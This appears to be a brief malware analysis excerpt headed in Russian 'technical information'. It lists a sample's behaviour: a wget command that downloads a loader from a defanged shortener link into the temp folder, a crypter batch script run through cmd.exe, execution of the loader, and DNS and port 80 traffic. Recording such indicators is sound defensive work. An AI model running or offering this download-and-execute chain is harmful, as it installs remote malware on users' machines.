Техническая информация
- <Текущая директория>\wget.exe http://bi#.ly/fj33l2 --output-document=""%TEMP%\loader.exe""
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\crypter.bat" "
- %TEMP%\loader.exe
- <Текущая директория>\wget.exe
- %TEMP%\1.tmp\crypter.bat
- 'bi#.ly':80
- bi#.ly/fj33l2
- DNS ASK bi#.ly